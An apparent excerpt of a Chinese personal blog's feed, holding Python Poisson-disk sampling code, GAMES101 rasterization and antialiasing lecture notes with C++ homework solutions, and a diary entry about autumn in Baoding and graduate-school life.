Step 2: While the active list is not empty, choose a random index from it (say $i$). Generate up to $k$ points chosen uniformly from the spherical annulus between radius $r$ and $2r$ around $x_i$. For each point in turn, check whether it is within distance $r$ of an existing sample (using the background grid to test only nearby samples). If a point is adequately far from all existing samples, emit it as the next sample and add it to the active list. If after $k$ attempts no such point is found, remove $i$ from the active list.

    3 Analysis

Step 2 executes at most $2N-1$ times to produce $N$ samples: each iteration either produces a new sample and adds it to the active list, or removes an existing index from the active list. Each iteration of Step 2 takes $O(k)$ time, and since $k$ is held constant (and typically very small), the algorithm is linear.

Code

import numpy as np
import matplotlib.pyplot as plt

r = 1               # minimum distance between samples
d = r / np.sqrt(2)  # cell size
k = 30              # limit of candidates to try before rejection
width = 20          # width of the sample domain
height = 16         # height of the sample domain

# Implement the grid as a simple 2D array
nx = int(width / d) + 1
ny = int(height / d) + 1
occupied = np.zeros((ny, nx))           # whether each cell is occupied
occupied_coord = np.zeros((ny, nx, 2))  # coordinates of the sample in each occupied cell
active_list = []                        # points waiting to be processed
sampled = []                            # points already sampled

# A matrix of relative offsets: the 18 neighbouring cells around a
# centre cell that could contain a conflicting sample.
relative = np.array([[-1, 2], [0, 2], [1, 2],
                     [-2, 1], [-1, 1], [0, 1], [1, 1], [2, 1],
                     [-2, 0], [-1, 0], [1, 0], [2, 0],
                     [-2, -1], [-1, -1], [0, -1], [1, -1], [2, -1],
                     [-1, -2], [0, -2], [1, -2]])
np.random.seed(0)
# Generate a random initial point with numpy.random.rand and register it
x, y = np.random.rand() * width, np.random.rand() * height
idx_x, idx_y = int(x / d), int(y / d)
occupied[idx_y, idx_x] = 1
occupied_coord[idx_y, idx_x] = (x, y)
active_list.append((x, y))
sampled.append((x, y))

sampled_idx = 0

while len(active_list) > 0:  # while the active list is not empty
    idx = np.random.choice(np.arange(len(active_list)))  # choose a random index, say i
    # Generate up to k points chosen uniformly from the annulus between r and 2r around x_i
    ref_x, ref_y = active_list[idx]
    radius = (np.random.rand(k) + 1) * r
    theta = np.random.rand(k) * np.pi * 2
    candidate = radius * np.cos(theta) + ref_x, radius * np.sin(theta) + ref_y
    flag_out = False
    for _x, _y in zip(*candidate):
        # Check whether each point is within distance r of existing samples
        if _x < 0 or _x > width or _y < 0 or _y > height:
            continue
        # other geo constraints
        flag = True
        idx_x, idx_y = int(_x / d), int(_y / d)
        if occupied[idx_y, idx_x] != 0:
            continue
        else:
            neighbours = relative + np.array([idx_x, idx_y])
            for cand_x, cand_y in neighbours:
                # Skip neighbour cells that fall outside the canvas
                if cand_x < 0 or cand_x >= nx or cand_y < 0 or cand_y >= ny:
                    continue
                if occupied[cand_y, cand_x] == 1:
                    # Fetch the sample stored in that cell
                    cood = occupied_coord[cand_y, cand_x]
                    # If its distance to the candidate is below the minimum radius r,
                    # the candidate violates the geometric constraint and is discarded
                    if (_x - cood[0]) ** 2 + (_y - cood[1]) ** 2 < r ** 2:
                        flag = False
                        break
        if flag:  # mark the cell occupied; record the sample and extend the active list
            flag_out = True
            occupied[idx_y, idx_x] = 1
            occupied_coord[idx_y, idx_x] = (_x, _y)
            sampled.append((_x, _y))
            active_list.append((_x, _y))
            sampled_idx += 1
            break
    if not flag_out:  # if no such point is found after k attempts, remove i from the active list
        active_list.pop(idx)

fig, ax = plt.subplots(1, 1, figsize=(9, 6))
fig.set_tight_layout(True)
ax.scatter(*zip(*sampled), c='g')
ax.set_xlim([0, width])
ax.set_ylim([0, height])
plt.show()
    ]]>
    @@ -4231,7 +4231,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%882%EF%BC%89/ - 资源

Course

    Lecture 05 Rasterization 1 (Triangles)

Perspective Projection

• What's near plane's $l, r, b, t$ then?

  • If explicitly specified, good

  • Sometimes people prefer: vertical field-of-view (fovY) and aspect ratio (assume symmetry, i.e. $l = -r, b = -t$)

png

• How to convert from fovY and aspect to $l, r, b, t$?

png

    $$\tan\frac{fovY}{2}=\frac{t}{|n|}$$

    $$aspect=\frac{r}{t}$$
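A small code sketch of this conversion (my own illustration; n is the near-plane distance, taken as a magnitude):

import numpy as np

def frustum_from_fov(fovY_deg, aspect, n):
    # From tan(fovY/2) = t / |n| and aspect = r / t.
    t = np.tan(np.radians(fovY_deg) / 2.0) * abs(n)
    r = aspect * t
    return -r, r, -t, t  # l, r, b, t for a symmetric frustum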

Canonical Cube to Screen

    • What is a screen?

      什么是屏幕?

      • An array of pixels

        像素阵列

      • Size of the array: resolution

        阵列大小:分辨率

      • A typical kind of raster display

        一种典型的光栅显示器

    • Raster == screen in German

      光栅 == 德语的屏幕

      • Rasterize == drawing onto the screen

        光栅化 == 在屏幕上绘制

    • Pixel (FYI, short for “picture element”)

      像素(仅供参考,“图像元素”的缩写)

      • For now: A pixel is a little square with uniform color

        目前:像素是一个颜色均匀的小方块

      • Color is a mixture of (red, green, blue)

        颜色是(红、绿、蓝)的混合物

    png

    • Pixels’ indices are in the form of $(x, y)$, where both $x$ and $y$ are integers.

      像素的索引采用 $(x, y)$ 的形式,其中 $x$ 和 $y$ 都是整数

    • Pixels’ indices are from $(0, 0)$ to $(\mathrm{width} - 1,\mathrm{height} - 1)$

      像素的索引从 $(0, 0)$ 到 $(\mathrm{width} - 1,\mathrm{height} - 1)$

    • Pixel $(x, y)$ is centered at $(x + 0.5, y + 0.5)$

      像素 $(x, y)$ 以 $(x + 0.5, y + 0.5)$ 为中心

    • The screen covers range $(0, 0)$ to $(\mathrm{width},\mathrm{height})$

      屏幕覆盖范围从 $(0, 0)$ 到 $(\mathrm{width},\mathrm{height})$

    • Irrelevant to $z$

      与 $z$ 轴无关

    • Transform in $xy$ plane: $[-1, 1]^2$ to $[0, \mathrm{width}] \times [0, \mathrm{height}]$

      在 $xy$ 平面中变换:$[-1, 1]^2$ 到 $[0, \mathrm{width}] \times [0, \mathrm{height}]$

    • Viewport transform matrix:

      视口变换矩阵:(缩放 + 平移,不涉及 $z$ 轴)

      $M_{viewport}=\begin{pmatrix}\frac{width}{2}&0&0&\frac{width}{2}\\0&\frac{height}{2}&0&\frac{height}{2}\\0&0&1&0\\0&0&0&1\end{pmatrix}$
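
    A quick numpy sketch of this matrix, following the convention above (a minimal sketch; the function name is illustrative):

    import numpy as np

    def viewport(width, height):
        # scale [-1, 1]^2 to [0, width] x [0, height]; z passes through unchanged
        return np.array([[width / 2, 0, 0, width / 2],
                         [0, height / 2, 0, height / 2],
                         [0, 0, 1, 0],
                         [0, 0, 0, 1]], dtype=float)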

    Drawing Machines 绘制仪器

    • CNC Sharpie Drawing Machine 绘图机
    • Laser Cutters 激光切割机

    Different Raster Displays 各种光栅显示设备

    • Oscilloscope

      示波器

    • Television - Raster Display CRT

      电视-光栅显示器 CRT

    • Frame Buffer: Memory for a Raster Display

      帧缓冲区:光栅显示的内存

    • Flat Panel Displays

      平板显示器

    • LCD (Liquid Crystal Display) Pixel

      LCD(液晶显示器)像素

      • Principle: block or transmit light by twisting polarization

        原理:通过扭曲偏振阻挡或透射光

      • Illumination from backlight (e.g. fluorescent or LED)

        背光照明(例如荧光灯或 LED)

      • Intermediate intensity levels by partial twist

        部分扭曲的中等强度水平

    • LED

      阵列显示器

      • Light emitting diode array

        发光二极管阵列

    • Electrophoretic (Electronic Ink) Display 电泳(电子墨水)显示器

      • 刷新率低,不适合看视频

    Rasterization: Drawing to Raster Displays 光栅化:绘制到光栅显示设备

    Triangles - Fundamental Shape Primitives 三角形-基本形状基元

    Why triangles?

    为什么是三角形?

    • Most basic polygon

      最基本的多边形

      • Break up other polygons

        分解其他多边形

    • Unique properties

      独特的特性

      • Guaranteed to be planar

        保证平面

      • Well-defined interior

        明确的内部

      • Well-defined method for interpolating values at vertices over triangle (barycentric interpolation)

        定义良好的三角形顶点插值方法(重心插值)

    png

    • Input: position of triangle vertices projected on screen

      输入:投影在屏幕上的三角形顶点的位置

    • Output: set of pixel values approximating triangle

      输出:近似三角形的像素值集

    A Simple Approach: Sampling 一种简单的方法:采样

    Sampling a Function 对函数进行采样

    Evaluating a function at a point is sampling.

    在一点上评估函数就是采样。
    We can discretize a function by sampling.

    我们可以通过采样来离散化一个函数。

    for (int x = 0; x < xmax; ++x)
        output[x] = f(x);

    Sampling is a core idea in graphics.

    采样是图形的核心思想。
    We sample time (1D), area (2D), direction (2D), volume (3D) …

    我们采样时间(1D)、面积(2D)、方向(2D)和体积(3D)…

    Define Binary Function 定义二值化函数: inside(tri, x, y)

    $$\texttt{inside}(t,x,y)=\begin{cases}1&\text{Point }(x,y)\text{ in triangle }t\\0&\text{otherwise}\end{cases}$$

    Rasterization = Sampling A 2D Indicator Function 光栅化 = 对 2D 指示器函数进行采样

    for (int x = 0; x < xmax; ++x)
        for (int y = 0; y < ymax; ++y)
            image[x][y] = inside(tri, x + 0.5, y + 0.5);

    通过判断像素点是否在三角形内部来决定上色。

    Inside? Recall: Three Cross Products!

    判断像素中心是否在三角形内部,可以用三次向量叉积的符号来判断。
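
    A minimal 2D sketch of this three-cross-product test (only the sign of the z component of each edge-to-point cross product matters; the names are illustrative):

    import numpy as np

    def cross2(a, b):
        # z component of the 2D cross product a x b
        return a[0] * b[1] - a[1] * b[0]

    def inside(tri, x, y):
        # (x, y) is inside when the three edge cross products share a sign
        p = np.array([x, y], dtype=float)
        signs = [cross2(tri[(i + 1) % 3] - tri[i], p - tri[i]) for i in range(3)]
        return all(s >= 0 for s in signs) or all(s <= 0 for s in signs)

    tri = [np.array([0.0, 0.0]), np.array([4.0, 0.0]), np.array([0.0, 4.0])]
    print(inside(tri, 1.0, 1.0), inside(tri, 5.0, 5.0))   # True False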

    Edge Cases (Literally) 边缘案例(字面意思)

    Is this sample point covered by triangle 1, triangle 2, or both?

    这个采样点是被三角形 1、三角形 2 覆盖,还是两者都覆盖?

    png

    落在边上的情况没有统一标准,一般由具体实现自行约定。

    Incremental Triangle Traversal (Faster?)

    更快地遍历三角形所覆盖像素的方法:增量式三角形遍历(类似扫描线)。

    png

    Rasterization on Real Displays 真实显示器上的光栅化

    Real LCD Screen Pixels (Closeup) 真实 LCD 屏幕像素(特写)

    png

    Notice R,G,B pixel geometry! But in this class, we will assume a colored square full-color pixel.

    注意 R,G,B 像素的几何图形(绿色更密集,因为人眼对绿色更敏感)!但在这个课程中,我们将假设一个彩色正方形全色像素(像素为图形的最小单位)。

    Aside: What About Other Display Methods?

    旁白:其他显示方法呢?

    png

    Color print: observe half-tone pattern
    彩色印刷:观察半色调图案

    Assume Display Pixels Emit Square of Light

    假设显示像素发射正方形光

    LCD pixels do not actually emit light in a square of uniform color, but this approximation suffices for our current discussion

    LCD 像素实际上并不以均匀颜色的正方形发光,但这个近似足以满足我们目前的讨论。

    Lecture 06 Rasterization 2 (Antialiasing and Z-Buffering)

    上节课得出的三角形,会出现很多锯齿。

    Sampling is Ubiquitous in Computer Graphics 采样在计算机图形学中无处不在

    • Rasterization = Sample 2D Positions 光栅化 = 采样 2D 位置

    • Photograph = Sample Image Sensor Plane 照片 = 对图像传感器平面采样

    • Video = Sample Time 视频 = 采样时间

    Sampling Artifacts (Errors / Mistakes / Inaccuracies) in Computer Graphics 计算机图形学中的采样伪影(瑕疵/错误/不准确)

    • Jaggies (Staircase Pattern) 锯齿(阶梯图案)

    png

    • Moiré Patterns in Imaging 成像中的莫尔条纹

    png

    成像时跳过奇数行和奇数列(欠采样)会产生莫尔条纹。
    • Wagon Wheel Illusion (False Motion) 车轮错觉(假动作)
      • 车轮转太快的时候,看起来像反着转。

    • Behind the Aliasing Artifacts 混叠伪影的背后
      • Signals are changing too fast (high frequency), but sampled too slowly 信号变化过快(高频),但采样过慢

    Antialiasing Idea: Blurring (Pre-Filtering) Before Sampling 抗锯齿思想:采样前模糊(预滤波)

    • Rasterization: Point Sampling in Space 栅格化:空间中的点采样

    png

    Note jaggies in rasterized triangle where pixel values are pure red or white

    注意光栅化三角形中像素值为纯红色或白色的锯齿

    Rasterization: Antialiased Sampling 光栅化:抗锯齿采样

    png

    Note antialiased edges in rasterized triangle where pixel values take intermediate values 注意光栅化三角形中的抗锯齿边,其中像素值取中间值

    Antialiasing vs Blurred Aliasing 消除混叠与模糊混叠

    png

    先采样再模糊是不对的!

    But why? 但为什么呢?

    1. Why undersampling introduces aliasing? 为什么欠采样会引入混叠?
    2. Why pre-filtering then sampling can do antialiasing? 为什么先滤波后采样可以做抗锯齿?
      Let’s dig into fundamental reasons 让我们深入探究根本原因
      And look at how to implement antialiased rasterization 看看如何实现抗锯齿光栅化

    Frequency Domain 频域

    Fourier Transform Decomposes A Signal Into Frequencies 傅立叶变换将信号分解为频率(时域与频域相互转换)

    png

    Higher Frequencies Need Faster Sampling 更高的频率需要更快的采样

    png

    • Low-frequency signal: sampled adequately for reasonable reconstruction

      低频信号:充分采样以进行合理重建

    • High-frequency signal is insufficiently sampled: reconstruction incorrectly appears to be from a low frequency signal

      高频信号采样不足:重建错误地显示为来自低频信号

    Undersampling Creates Frequency Aliases 欠采样创建频率混叠

    • High-frequency signal is insufficiently sampled: samples erroneously appear to be from a low-frequency signal
      • 高频信号采样不足:样本错误地看起来来自低频信号
    • Two frequencies that are indistinguishable at a given sampling rate are called “aliases”
      • 在给定的采样率下无法区分的两个频率被称为“别名”

    Filtering = Getting rid of certain frequency contents 过滤 = 去除某些频率内容

    png

    对图像进行傅里叶变换。

    Filter Out Low Frequencies Only (Edges) 仅滤除低频(边缘)

    png

    高通滤波

    Filter Out High Frequencies (Blur) 滤除高频(模糊)

    png

    低通滤波

    Filter Out Low and High Frequencies 滤除低频和高频

    png

    Filter Out Low and High Frequencies 滤除低频和高频

    png

    Filtering = Convolution (= Averaging) 滤波=卷积(=平均)

    卷积定理

    Convolution Theorem

    空间域中的卷积等于频率域中的乘法,反之亦然

    Convolution in the spatial domain is equal to multiplication in the frequency domain, and vice versa

    Option 1: 选项 1:

    • Filter by convolution in the spatial domain

      在空间域中通过卷积进行滤波

    Option 2: 选项 2:

    • Transform to frequency domain (Fourier transform)

      变换到频域(傅立叶变换)

    • Multiply by Fourier transform of convolution kernel

      乘以卷积核的傅立叶变换

    • Transform back to spatial domain (inverse Fourier transform)

      转换回空间域(傅立叶逆变换)
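
    As a small numerical check of the convolution theorem, the two options below compute the same (circular) convolution of a 1-D signal with a box kernel; the signal length and kernel width are arbitrary choices:

    import numpy as np

    N = 64
    signal = np.random.rand(N)
    kernel = np.zeros(N)
    kernel[:3] = 1 / 3.0   # a 1-D box ("low-pass") kernel

    # Option 1: filter by (circular) convolution in the spatial domain
    spatial = np.array([np.sum(signal * np.roll(kernel[::-1], n + 1))
                        for n in range(N)])

    # Option 2: transform, multiply the spectra, transform back
    freq = np.real(np.fft.ifft(np.fft.fft(signal) * np.fft.fft(kernel)))

    print(np.allclose(spatial, freq))   # True: the two options agree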

    png

    • Box Function = “Low Pass” Filter

      方框函数 = “低通”滤波器

    • Wider Filter Kernel = Lower Frequencies

      较宽滤波器内核 = 较低频率

    Sampling = Repeating Frequency Contents 采样 = 重复频率内容

    png

    Aliasing = Mixed Frequency Contents 混叠 = 混合频率内容(这是不好的)

    png

    Antialiasing 抗锯齿

    How Can We Reduce Aliasing Error? 如何减少混叠错误?
    Option 1: Increase sampling rate 选项 1:提高采样率

    • Essentially increasing the distance between replicas in the Fourier domain

      本质上增加了傅立叶域中副本之间的距离

    • Higher resolution displays, sensors, framebuffers…

      更高分辨率的显示器、传感器、帧缓冲区…

    • But: costly & may need very high resolution

      但是:成本高昂,可能需要非常高的分辨率

    Option 2: Antialiasing 选项 2:消除混叠

    • Making Fourier contents “narrower” before repeating

      在重复之前使傅立叶内容“变窄”

    • i.e. Filtering out high frequencies before sampling

      即在采样前滤除高频

    Antialiasing = Limiting, then repeating 抗锯齿 = 先限制(滤除高频),再重复(采样)

    png

    Antialiasing By Averaging Values in Pixel Area 通过平均像素区域中的值消除混叠
    Solution: 解决方案:

    • Convolve $f(x,y)$ by a 1-pixel box-blur

      用 1 像素宽的盒状滤波(box blur)对 $f(x,y)$ 做卷积(见本节后的示例)

      • Recall: convolving = filtering = averaging

        回想:卷积 = 滤波 = 平均

    • Then sample at every pixel’s center

      然后在每个像素的中心进行采样
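
    A minimal numpy sketch of this box-filter-then-sample recipe, assuming the indicator $f$ has already been evaluated on a grid with ss x ss sample positions per pixel (the block-average implementation is my own shortcut for the 1-pixel box filter):

    import numpy as np

    def box_filter_then_sample(f, ss=4):
        # average each ss x ss tile: this equals the 1-pixel box blur
        # evaluated exactly at every pixel's centre
        # (assumes both dimensions of f are divisible by ss)
        h, w = f.shape
        return f.reshape(h // ss, ss, w // ss, ss).mean(axis=(1, 3))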

    Antialiasing by Computing Average Pixel Value 通过计算平均像素值消除混叠
    In rasterizing one triangle, the average value inside a pixel area of $f(x,y) = inside(triangle,x,y)$ is equal to the area of the pixel covered by the triangle.

    在光栅化一个三角形时,$f(x,y) = inside(triangle,x,y)$ 在单个像素区域内的平均值,等于该像素被三角形覆盖的面积比例。

    png

    Antialiasing By Supersampling (MSAA) 通过超级采样消除混叠(MSAA)

    Supersampling 超采样
    Approximate the effect of the 1-pixel box filter by sampling multiple locations within a pixel and averaging their values:

    通过对一个像素内的多个位置进行采样并对其值取平均值来近似 1 像素盒滤波器的效果:

    png

    • Take $N\times N$ samples in each pixel.

      在每个像素中取 $N\times N$ 个样本。

    • Average the $N\times N$ samples “inside” each pixel.

      平均每个像素“内部”的 $N\times N$ 个样本。

    • This is the corresponding signal emitted by the display

      这就是显示器最终发出的对应信号:

    png

    Antialiasing Today 现在消除混叠的方法
    No free lunch!

    • What’s the cost of MSAA?

      MSAA的代价是什么?更高的计算量

    Milestones (personal idea)

    • FXAA (Fast Approximate AA)

      基于图像后处理的抗锯齿算法

    • TAA (Temporal AA)

      基于时序的抗锯齿算法

    Super resolution / super sampling 超分辨率/超采样

    • From low resolution to high resolution

      从低分辨率到高分辨率

    • Essentially still “not enough samples” problem

      本质上仍然存在“样本不足”的问题

    • DLSS (Deep Learning Super Sampling)

      DLSS(深度学习超级采样)

    HW2

    在上次作业中,虽然我们在屏幕上画出一个线框三角形,但这看起来并不是那么的有趣。所以这一次我们继续推进一步——在屏幕上画出一个实心三角形,换言之,栅格化一个三角形。上一次作业中,在视口变换之后,我们调用了函数 rasterize_wireframe(const Triangle& t)。但这一次,你需要自己填写并调用函数 rasterize_triangle(const Triangle& t)。
    该函数的内部工作流程如下:

    1. 创建三角形的 2 维 bounding box。

    2. 遍历此 bounding box 内的所有像素(使用其整数索引)。然后,使用像素中心的屏幕空间坐标来检查中心点是否在三角形内。

    3. 如果在内部,则将其位置处的插值深度值 (interpolated depth value) 与深度缓冲区 (depth buffer) 中的相应值进行比较。

    4. 如果当前点更靠近相机,请设置像素颜色并更新深度缓冲区 (depth buffer)。
      你需要修改的函数如下:

    rasterize_triangle(): 执行三角形栅格化算法
    static bool insideTriangle(): 测试点是否在三角形内。你可以修改此函数的定义,这意味着,你可以按照自己的方式更新返回类型或函数参数。
    因为我们只知道三角形三个顶点处的深度值,所以对于三角形内部的像素,我们需要用插值的方法得到其深度值。我们已经为你处理好了这一部分,因为有关这方面的内容尚未在课程中涉及。插值的深度值被储存在变量 z_interpolated 中。


    rasterize_triangle(): 执行三角形栅格化算法

    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
        auto v = t.toVector4();
        // TODO : Find out the bounding box of current triangle.
        // iterate through the pixel and find if the current pixel is inside the triangle
        int min_x = INT_MAX;
        int max_x = INT_MIN;
        int min_y = INT_MAX;
        int max_y = INT_MIN;
        for (auto point : v) // bounding box of the triangle (pixel indices)
        {
            if (point[0] < min_x) min_x = point[0];
            if (point[0] > max_x) max_x = point[0];
            if (point[1] < min_y) min_y = point[1];
            if (point[1] > max_y) max_y = point[1];
        }
        // If so, use the following code to get the interpolated z value.
        //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
        //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
        //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
        //z_interpolated *= w_reciprocal;

        // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
        for (int x = min_x; x <= max_x; ++x)
        {
            for (int y = min_y; y <= max_y; ++y)
            {
                if (insideTriangle(x + 0.5, y + 0.5, t.v)) // test the pixel centre
                {
                    auto [alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
                    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
                    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
                    z_interpolated *= w_reciprocal;

                    if (z_interpolated < depth_buf[get_index(x, y)]) // closer to the camera
                    {
                        depth_buf[get_index(x, y)] = z_interpolated;
                        Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
                        set_pixel(point, t.getColor());
                    }
                }
            }
        }
    }

    static bool insideTriangle(): 测试点是否在三角形内

    要使用向量的叉乘来判断一个点是否在三角形内部,可以按照以下步骤进行:

    1. 假设有一个三角形,其中包含三个顶点 A、B 和 C。
    2. 给定一个待检测的点 P。
    3. 使用向量 AB 和向量 AP 进行叉乘,并计算得到叉乘结果 cross1。
    4. 使用向量 BC 和向量 BP 进行叉乘,并计算得到叉乘结果 cross2。
    5. 使用向量 CA 和向量 CP 进行叉乘,并计算得到叉乘结果 cross3。
    6. 检查 cross1、cross2 和 cross3 的符号。如果它们都具有相同的符号(正数或负数),则点 P 在三角形的内部。否则,点 P 不在三角形的内部。

    具体来说,叉乘结果的方向可以用右手定则确定:右手四指从第一条向量(如 AB)弯向第二条向量(如 AP),拇指所指即叉乘结果的方向。对于屏幕平面内的二维向量,只需看叉乘结果 z 分量的正负。

    这种方法基于叉乘的性质,通过检查三个叉乘结果的符号来判断点 P 是否在三角形内部:如果三个结果符号相同,说明点 P 位于三条边的同一侧,即在三角形内部;如果符号不同,则点 P 在某条边之外,即不在三角形内部。

    请注意,这种方法只适用于点和三角形都位于同一平面上的情况。

    static bool insideTriangle(float x, float y, const Vector3f* _v) // int -> float, so sub-pixel sample positions are not truncated
    {
        // TODO : Implement this function to check if the point (x, y) is inside the triangle represented by _v[0], _v[1], _v[2]
        Eigen::Vector3f AP(x - _v[0][0], y - _v[0][1], 0);
        Eigen::Vector3f BP(x - _v[1][0], y - _v[1][1], 0);
        Eigen::Vector3f CP(x - _v[2][0], y - _v[2][1], 0);
        Eigen::Vector3f AB(_v[1][0] - _v[0][0], _v[1][1] - _v[0][1], 0);
        Eigen::Vector3f BC(_v[2][0] - _v[1][0], _v[2][1] - _v[1][1], 0);
        Eigen::Vector3f CA(_v[0][0] - _v[2][0], _v[0][1] - _v[2][1], 0);
        // inside iff the three cross products' z components share a sign
        return AB.cross(AP).z() * BC.cross(BP).z() >= 0 && BC.cross(BP).z() * CA.cross(CP).z() >= 0;
    }

    $2\times2$ MSAA:

    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
        auto v = t.toVector4();

        // TODO : Find out the bounding box of current triangle.
        // iterate through the pixel and find if the current pixel is inside the triangle
        int min_x = INT_MAX;
        int max_x = INT_MIN;
        int min_y = INT_MAX;
        int max_y = INT_MIN;
        for (auto point : v) // bounding box of the triangle (pixel indices)
        {
            if (point[0] < min_x) min_x = point[0];
            if (point[0] > max_x) max_x = point[0];
            if (point[1] < min_y) min_y = point[1];
            if (point[1] > max_y) max_y = point[1];
        }
        // If so, use the following code to get the interpolated z value.
        //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
        //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
        //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
        //z_interpolated *= w_reciprocal;

        // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
        for (int x = min_x; x <= max_x; ++x)
        {
            for (int y = min_y; y <= max_y; ++y)
            {
                // 2x2 sub-samples per pixel; rate accumulates the covered fraction
                float rate = 0.0f;
                if (insideTriangle(x + 0.25, y + 0.25, t.v))
                    rate += 0.25f;
                if (insideTriangle(x + 0.75, y + 0.75, t.v))
                    rate += 0.25f;
                if (insideTriangle(x + 0.75, y + 0.25, t.v))
                    rate += 0.25f;
                if (insideTriangle(x + 0.25, y + 0.75, t.v))
                    rate += 0.25f;
                if (rate > 0.0f)
                {
                    auto [alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
                    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
                    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
                    z_interpolated *= w_reciprocal;

                    if (z_interpolated < depth_buf[get_index(x, y)])
                    {
                        depth_buf[get_index(x, y)] = z_interpolated;
                        Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
                        // Simplified MSAA: one depth value per pixel and the colour
                        // scaled by coverage; a full version keeps per-sample
                        // depth and colour buffers.
                        set_pixel(point, rate * t.getColor());
                    }
                }
            }
        }
    }
    ]]>
    @@ -4258,7 +4258,7 @@ /posts/Diary-4-%E5%AF%92%E9%A3%8E%E4%B8%8E%E9%9B%BE%E9%9C%BE/ - 前言

    jpg

    梧桐与银杏

    ​ 近看银杏要比远看银杏更黄一些。

    ​ 这么看这 14 天里只有 3 天的天空比较正常……


    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [8, 10, 10, 4, 3, 7, 6, 5, 6, 9, 5, 5, 6, 7] # 当日最低温
    y2 = [23, 24, 24, 21, 18, 21, 22, 25, 24, 27, 22, 24, 21, 24] # 当日最高温
    y3 = [39, 63, 40, 43, 37, 66, 67, 109, 173, 187, 64, 68, 206, 175] # 当日 PM 值

    png

    ​ 这么近那么美,周末到河北。出门一脸灰,我不去河北。

    正文

    10.16

    jpg

    ​ 开始变黄的银杏树。

    ​ 脚贱去踩银杏玩,结果弄得整个鞋底都是臭烘烘的,喜提刷鞋,寄!

    10.20

    小迷糊冷不冷
    冷死我了
    昨天还穿短袖
    今天一早就寄

    ​ 大早上差点没冻傻,这个气温几乎是福州最冷的时候了。

    ​ 中午赶忙跑回去把秋衣手套围巾啥都整了。

    jpg

    ​ 北方的秋天来了。

    10.21

    jpg

    ​ 图书馆门口抱团取暖的鸭鸭。

    ​ 气温骤降随之而来的就是雾霾。雾霾把整张照片都弄得灰蒙蒙的,忍不住用 PS 调色了一下。

    10.22

    jpg

    ​ 舍友说想去钓鱼,于是陪他去钓鱼。

    ​ 骑车去了护城河那边发了两小时呆又回来了。

    10.23

    ​ 今天学校里臭烘烘的,上网查了下整个保定都臭哄哄的,不知道又在左线挠。污染真的太严重了啊啊啊啊啊啊啊

    10.24

    ​ 跟着教程把 Blender 入了个门,今天终于结束了教程。

    ​ 这段时间把科研搁置在了一边,去学了点本科专业相关的东西,却感觉到十分的自在。好怀念读本科的那个时候,觉得自己的专业课很有意义,我喜欢用计算机创造一些有趣的东西而不是炼丹写八股文。好想把论文水了去实习算了只要离开冀大就是胜利!

    ​ 想想毕业以后还是继续从事游戏行业?去追求自己所喜爱的,而不是父母所希望的那种较稳定轻松但是看着就无聊的工作主要是考不上也不想花太多精力去白给。要是干烦了再去考编也不迟,只要代码写得好转哪行都会吃香的。

    前一阵子刷一些招聘的
    看来看去还是开发岗位多
    咱们省内的
    拼一拼去北上广
    我父母不想让我加班 可我觉得编制又好无聊 不怎么感兴趣
    可以可以 我觉得干咱们这一行还得去北上广深这类地方
    当初我也是瞧不上编制
    现在求着编制收我
    太水的编制我觉得还不如追求自己喜爱的
    当时把伟哥挂投影仪上的时候我可开心了
    哈哈哈
    好的呢
    确实是有意义这个

    10.25

    感觉明天开组会,因为明天双选会
    真慢
    去年这时候我已经摸上伟哥了
    你不对劲

    ​ 新研一马上就要进组了,不再疫往情深,冀大效率居然比去年还慢!

    jpg

    ​ 偷跑去逛超市还能看到卖莆田枇杷的,买了一瓶尝尝。

    ​ 太甜了,根本就没有老家摘的那么难吃。

    jpg

    ​ 感觉是把植物园的招牌搬过来了。不!我不 ♥ BD!


    ​ 天气又转暖了,之前看的 11.4 下雪的天气预报也变卦了,血亏!

    10.26

    今晚七点在 326 开组会,和研一同学一起,大家记得准时到。

    ​ 组会就是新研一的见面会。我在自我介绍的时候还 balabala 了一大串,想做游戏啊想 PS 啊想三维建模啊想打羽毛球啊想下棋啊都可以来找我,笑死,感觉自己还蛮有特点的。

    ​ 看着新研一青涩的样子还真有点一年前自己的影子呢。可惜今年进来的都是一志愿的,全是北方人呜呜呜,而且都没有伟哥帅……

    ​ 导师说新研一要对自己读研要有目标,找工作啊读博啊甚至找对象都是目标。

    ​ 导师说课余时间要适当放松,注意身体,生活上有困难都可以跟导师说。去年刚毕业的师兄都腰椎间盘突出了,可怕。

    ​ 导师又说研究生更要懂得为人处世之道,但又要保持一定的单纯,总之要保持某种平衡吧。

    ​ 导师还说见到其他老师要打招呼,实验室的电力系统拉的一笔不要乱搞,怎么感觉又被内涵了……

    ​ 导师最后还让我们这些老同志说说对学习生活的体会:最牛逼的伟哥说研究生更要有自己学习的能力;实验受挫的杰杰说有时候努力并不一定有回报;我直接来了句“太痛苦啦”,引得师门都哄笑起来:326 里充满了快活的空气。

    10.27

    ​ 今天有两篇令我很震惊的新闻,感觉去年这个时候他们还经常出现的,世事无常啊……

